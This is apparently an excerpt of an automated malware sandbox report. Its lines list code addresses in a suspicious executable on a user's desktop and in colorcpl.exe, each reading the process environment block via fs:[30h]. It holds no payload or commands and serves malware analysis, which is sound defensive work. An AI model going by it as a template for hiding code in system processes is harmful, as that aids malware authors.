Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A5210 mov eax, dword ptr fs:[00000030h]		2_2_013A5210
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A5210 mov eax, dword ptr fs:[00000030h]		2_2_013A5210
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AAA16 mov eax, dword ptr fs:[00000030h]		2_2_013AAA16
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AAA16 mov eax, dword ptr fs:[00000030h]		2_2_013AAA16
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B8A0A mov eax, dword ptr fs:[00000030h]		2_2_013B8A0A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AC600 mov eax, dword ptr fs:[00000030h]		2_2_013AC600
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AC600 mov eax, dword ptr fs:[00000030h]		2_2_013AC600
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013AC600 mov eax, dword ptr fs:[00000030h]		2_2_013AC600
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D8E00 mov eax, dword ptr fs:[00000030h]		2_2_013D8E00
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E927A mov eax, dword ptr fs:[00000030h]		2_2_013E927A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01461608 mov eax, dword ptr fs:[00000030h]		2_2_01461608
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]		2_2_013CAE73
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]		2_2_013CAE73
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]		2_2_013CAE73
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]		2_2_013CAE73
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]		2_2_013CAE73
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B766D mov eax, dword ptr fs:[00000030h]		2_2_013B766D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h]		2_2_013A9240
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h]		2_2_013A9240
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h]		2_2_013A9240
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h]		2_2_013A9240
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0145FE3F mov eax, dword ptr fs:[00000030h]		2_2_0145FE3F
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]		2_2_013B7E41
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]		2_2_013B7E41
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]		2_2_013B7E41
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]		2_2_013B7E41
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]		2_2_013B7E41
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]		2_2_013B7E41
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0145FEC0 mov eax, dword ptr fs:[00000030h]		2_2_0145FEC0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013BAAB0 mov eax, dword ptr fs:[00000030h]		2_2_013BAAB0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013BAAB0 mov eax, dword ptr fs:[00000030h]		2_2_013BAAB0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DFAB0 mov eax, dword ptr fs:[00000030h]		2_2_013DFAB0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01478ED6 mov eax, dword ptr fs:[00000030h]		2_2_01478ED6
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]		2_2_013A52A5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]		2_2_013A52A5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]		2_2_013A52A5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]		2_2_013A52A5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]		2_2_013A52A5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DD294 mov eax, dword ptr fs:[00000030h]		2_2_013DD294
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013DD294 mov eax, dword ptr fs:[00000030h]		2_2_013DD294
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_0143FE87 mov eax, dword ptr fs:[00000030h]		2_2_0143FE87
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013B76E2 mov eax, dword ptr fs:[00000030h]		2_2_013B76E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D2AE4 mov eax, dword ptr fs:[00000030h]		2_2_013D2AE4
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D16E0 mov ecx, dword ptr fs:[00000030h]		2_2_013D16E0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01470EA5 mov eax, dword ptr fs:[00000030h]		2_2_01470EA5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01470EA5 mov eax, dword ptr fs:[00000030h]		2_2_01470EA5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_01470EA5 mov eax, dword ptr fs:[00000030h]		2_2_01470EA5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_014246A7 mov eax, dword ptr fs:[00000030h]		2_2_014246A7
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D36CC mov eax, dword ptr fs:[00000030h]		2_2_013D36CC
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013D2ACB mov eax, dword ptr fs:[00000030h]		2_2_013D2ACB
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 2_2_013E8EC7 mov eax, dword ptr fs:[00000030h]		2_2_013E8EC7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0471746D mov eax, dword ptr fs:[00000030h]		15_2_0471746D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0478C450 mov eax, dword ptr fs:[00000030h]		15_2_0478C450
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0478C450 mov eax, dword ptr fs:[00000030h]		15_2_0478C450
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472A44B mov eax, dword ptr fs:[00000030h]		15_2_0472A44B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472BC2C mov eax, dword ptr fs:[00000030h]		15_2_0472BC2C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C740D mov eax, dword ptr fs:[00000030h]		15_2_047C740D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C740D mov eax, dword ptr fs:[00000030h]		15_2_047C740D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C740D mov eax, dword ptr fs:[00000030h]		15_2_047C740D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]		15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h]		15_2_04776C0A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h]		15_2_04776C0A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h]		15_2_04776C0A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h]		15_2_04776C0A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B14FB mov eax, dword ptr fs:[00000030h]		15_2_047B14FB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04776CF0 mov eax, dword ptr fs:[00000030h]		15_2_04776CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04776CF0 mov eax, dword ptr fs:[00000030h]		15_2_04776CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04776CF0 mov eax, dword ptr fs:[00000030h]		15_2_04776CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C8CD6 mov eax, dword ptr fs:[00000030h]		15_2_047C8CD6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0470849B mov eax, dword ptr fs:[00000030h]		15_2_0470849B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0471C577 mov eax, dword ptr fs:[00000030h]		15_2_0471C577
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0471C577 mov eax, dword ptr fs:[00000030h]		15_2_0471C577
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04717D50 mov eax, dword ptr fs:[00000030h]		15_2_04717D50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04733D43 mov eax, dword ptr fs:[00000030h]		15_2_04733D43
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04773540 mov eax, dword ptr fs:[00000030h]		15_2_04773540
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047A3D40 mov eax, dword ptr fs:[00000030h]		15_2_047A3D40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0477A537 mov eax, dword ptr fs:[00000030h]		15_2_0477A537
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047BE539 mov eax, dword ptr fs:[00000030h]		15_2_047BE539
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]		15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]		15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]		15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]		15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]		15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]		15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]		15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]		15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]		15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]		15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]		15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]		15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]		15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C8D34 mov eax, dword ptr fs:[00000030h]		15_2_047C8D34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04724D3B mov eax, dword ptr fs:[00000030h]		15_2_04724D3B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04724D3B mov eax, dword ptr fs:[00000030h]		15_2_04724D3B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04724D3B mov eax, dword ptr fs:[00000030h]		15_2_04724D3B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FAD30 mov eax, dword ptr fs:[00000030h]		15_2_046FAD30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047A8DF1 mov eax, dword ptr fs:[00000030h]		15_2_047A8DF1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0470D5E0 mov eax, dword ptr fs:[00000030h]		15_2_0470D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0470D5E0 mov eax, dword ptr fs:[00000030h]		15_2_0470D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047BFDE2 mov eax, dword ptr fs:[00000030h]		15_2_047BFDE2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047BFDE2 mov eax, dword ptr fs:[00000030h]		15_2_047BFDE2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047BFDE2 mov eax, dword ptr fs:[00000030h]		15_2_047BFDE2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047BFDE2 mov eax, dword ptr fs:[00000030h]		15_2_047BFDE2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h]		15_2_04776DC9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h]		15_2_04776DC9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h]		15_2_04776DC9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04776DC9 mov ecx, dword ptr fs:[00000030h]		15_2_04776DC9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h]		15_2_04776DC9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h]		15_2_04776DC9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04721DB5 mov eax, dword ptr fs:[00000030h]		15_2_04721DB5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04721DB5 mov eax, dword ptr fs:[00000030h]		15_2_04721DB5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04721DB5 mov eax, dword ptr fs:[00000030h]		15_2_04721DB5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C05AC mov eax, dword ptr fs:[00000030h]		15_2_047C05AC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C05AC mov eax, dword ptr fs:[00000030h]		15_2_047C05AC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047235A1 mov eax, dword ptr fs:[00000030h]		15_2_047235A1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h]		15_2_046F2D8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h]		15_2_046F2D8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h]		15_2_046F2D8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h]		15_2_046F2D8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h]		15_2_046F2D8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472FD9B mov eax, dword ptr fs:[00000030h]		15_2_0472FD9B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472FD9B mov eax, dword ptr fs:[00000030h]		15_2_0472FD9B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04722581 mov eax, dword ptr fs:[00000030h]		15_2_04722581
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04722581 mov eax, dword ptr fs:[00000030h]		15_2_04722581
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04722581 mov eax, dword ptr fs:[00000030h]		15_2_04722581
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04722581 mov eax, dword ptr fs:[00000030h]		15_2_04722581
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h]		15_2_0471AE73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h]		15_2_0471AE73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h]		15_2_0471AE73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h]		15_2_0471AE73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0471AE73 mov eax, dword ptr fs:[00000030h]		15_2_0471AE73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0470766D mov eax, dword ptr fs:[00000030h]		15_2_0470766D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h]		15_2_04707E41
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h]		15_2_04707E41
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h]		15_2_04707E41
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h]		15_2_04707E41
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h]		15_2_04707E41
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04707E41 mov eax, dword ptr fs:[00000030h]		15_2_04707E41
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047BAE44 mov eax, dword ptr fs:[00000030h]		15_2_047BAE44
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047BAE44 mov eax, dword ptr fs:[00000030h]		15_2_047BAE44
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047AFE3F mov eax, dword ptr fs:[00000030h]		15_2_047AFE3F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FE620 mov eax, dword ptr fs:[00000030h]		15_2_046FE620
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472A61C mov eax, dword ptr fs:[00000030h]		15_2_0472A61C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472A61C mov eax, dword ptr fs:[00000030h]		15_2_0472A61C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FC600 mov eax, dword ptr fs:[00000030h]		15_2_046FC600
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FC600 mov eax, dword ptr fs:[00000030h]		15_2_046FC600
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FC600 mov eax, dword ptr fs:[00000030h]		15_2_046FC600
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04728E00 mov eax, dword ptr fs:[00000030h]		15_2_04728E00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B1608 mov eax, dword ptr fs:[00000030h]		15_2_047B1608
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047216E0 mov ecx, dword ptr fs:[00000030h]		15_2_047216E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047076E2 mov eax, dword ptr fs:[00000030h]		15_2_047076E2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C8ED6 mov eax, dword ptr fs:[00000030h]		15_2_047C8ED6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04738EC7 mov eax, dword ptr fs:[00000030h]		15_2_04738EC7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047AFEC0 mov eax, dword ptr fs:[00000030h]		15_2_047AFEC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047236CC mov eax, dword ptr fs:[00000030h]		15_2_047236CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047746A7 mov eax, dword ptr fs:[00000030h]		15_2_047746A7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C0EA5 mov eax, dword ptr fs:[00000030h]		15_2_047C0EA5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C0EA5 mov eax, dword ptr fs:[00000030h]		15_2_047C0EA5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C0EA5 mov eax, dword ptr fs:[00000030h]		15_2_047C0EA5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0478FE87 mov eax, dword ptr fs:[00000030h]		15_2_0478FE87
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0470FF60 mov eax, dword ptr fs:[00000030h]		15_2_0470FF60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C8F6A mov eax, dword ptr fs:[00000030h]		15_2_047C8F6A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0470EF40 mov eax, dword ptr fs:[00000030h]		15_2_0470EF40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F4F2E mov eax, dword ptr fs:[00000030h]		15_2_046F4F2E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F4F2E mov eax, dword ptr fs:[00000030h]		15_2_046F4F2E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472E730 mov eax, dword ptr fs:[00000030h]		15_2_0472E730
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0471F716 mov eax, dword ptr fs:[00000030h]		15_2_0471F716
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0478FF10 mov eax, dword ptr fs:[00000030h]		15_2_0478FF10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0478FF10 mov eax, dword ptr fs:[00000030h]		15_2_0478FF10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C070D mov eax, dword ptr fs:[00000030h]		15_2_047C070D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C070D mov eax, dword ptr fs:[00000030h]		15_2_047C070D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472A70E mov eax, dword ptr fs:[00000030h]		15_2_0472A70E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472A70E mov eax, dword ptr fs:[00000030h]		15_2_0472A70E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047337F5 mov eax, dword ptr fs:[00000030h]		15_2_047337F5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04777794 mov eax, dword ptr fs:[00000030h]		15_2_04777794
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04777794 mov eax, dword ptr fs:[00000030h]		15_2_04777794
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04777794 mov eax, dword ptr fs:[00000030h]		15_2_04777794
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04708794 mov eax, dword ptr fs:[00000030h]		15_2_04708794
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B2073 mov eax, dword ptr fs:[00000030h]		15_2_047B2073
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C1074 mov eax, dword ptr fs:[00000030h]		15_2_047C1074
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04710050 mov eax, dword ptr fs:[00000030h]		15_2_04710050
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04710050 mov eax, dword ptr fs:[00000030h]		15_2_04710050
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0470B02A mov eax, dword ptr fs:[00000030h]		15_2_0470B02A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0470B02A mov eax, dword ptr fs:[00000030h]		15_2_0470B02A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0470B02A mov eax, dword ptr fs:[00000030h]		15_2_0470B02A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0470B02A mov eax, dword ptr fs:[00000030h]		15_2_0470B02A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472002D mov eax, dword ptr fs:[00000030h]		15_2_0472002D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472002D mov eax, dword ptr fs:[00000030h]		15_2_0472002D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472002D mov eax, dword ptr fs:[00000030h]		15_2_0472002D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472002D mov eax, dword ptr fs:[00000030h]		15_2_0472002D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472002D mov eax, dword ptr fs:[00000030h]		15_2_0472002D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04777016 mov eax, dword ptr fs:[00000030h]		15_2_04777016
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04777016 mov eax, dword ptr fs:[00000030h]		15_2_04777016
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04777016 mov eax, dword ptr fs:[00000030h]		15_2_04777016
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C4015 mov eax, dword ptr fs:[00000030h]		15_2_047C4015
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C4015 mov eax, dword ptr fs:[00000030h]		15_2_047C4015
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F58EC mov eax, dword ptr fs:[00000030h]		15_2_046F58EC
